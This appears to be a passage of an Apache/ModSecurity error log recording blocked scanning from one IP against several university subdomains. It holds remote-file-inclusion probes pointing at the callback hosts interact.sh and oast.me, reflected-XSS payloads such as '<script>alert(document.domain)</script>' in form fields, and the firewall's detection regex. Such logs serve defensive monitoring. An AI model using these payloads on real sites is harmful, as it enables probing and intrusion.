[Tue Aug 29 11:55:12.626960 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16MMCo-f0AAAqeFSIAAAAx"]
[Tue Aug 29 11:55:12.647421 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16MMCo-f0AAApa-NIAAAAg"]
[Tue Aug 29 11:55:12.648259 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16MMCo-f0AAAqeFSMAAAAx"]
[Tue Aug 29 11:55:12.666021 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16MMCo-f0AAApOdiUAAAAL"]
[Tue Aug 29 11:55:13.549959 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16McCo-f0AAAqqtbwAAAAA"]
[Tue Aug 29 11:55:14.555467 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16MsCo-f0AAApXgnYAAAAU"]
[Tue Aug 29 11:55:14.557216 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16MsCo-f0AAApOdioAAAAL"]
[Tue Aug 29 11:55:14.559818 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16MsCo-f0AAAqY6A0AAAAr"]
[Tue Aug 29 11:55:14.588531 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16MsCo-f0AAAqsV4IAAAAB"]
[Tue Aug 29 11:55:14.652136 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16MsCo-f0AAAqqtcMAAAAA"]
[Tue Aug 29 11:55:14.685177 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16MsCo-f0AAApbUeEAAAAh"]
[Tue Aug 29 11:55:14.690148 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16MsCo-f0AAApOdi8AAAAL"]
[Tue Aug 29 11:55:14.711220 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16MsCo-f0AAApXgnsAAAAU"]
[Tue Aug 29 11:55:14.712855 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16MsCo-f0AAAoz8D8AAAAS"]
[Tue Aug 29 11:55:15.576084 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16M8Co-f0AAAqeFSgAAAAx"]
[Tue Aug 29 11:55:15.591340 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16M8Co-f0AAAqsV4cAAAAB"]
[Tue Aug 29 11:55:16.148615 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16NMCo-f0AAApOdjkAAAAL"]
[Tue Aug 29 11:55:16.531511 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NMCo-f0AAAqeFSsAAAAx"]
[Tue Aug 29 11:55:16.538597 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NMCo-f0AAAqsV4oAAAAB"]
[Tue Aug 29 11:55:16.550738 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NMCo-f0AAAqY6BMAAAAr"]
[Tue Aug 29 11:55:16.594912 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NMCo-f0AAAqTvpAAAAAa"]
[Tue Aug 29 11:55:16.643658 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/payform.php"] [unique_id "ZO16NMCo-f0AAAqTvpEAAAAa"]
[Tue Aug 29 11:55:16.648964 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NMCo-f0AAAqY6BUAAAAr"]
[Tue Aug 29 11:55:16.671345 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/payform.php"] [unique_id "ZO16NMCo-f0AAAqY6BYAAAAr"]
[Tue Aug 29 11:55:16.683813 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/payform.php"] [unique_id "ZO16NMCo-f0AAAqTvpMAAAAa"]
[Tue Aug 29 11:55:16.724960 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri 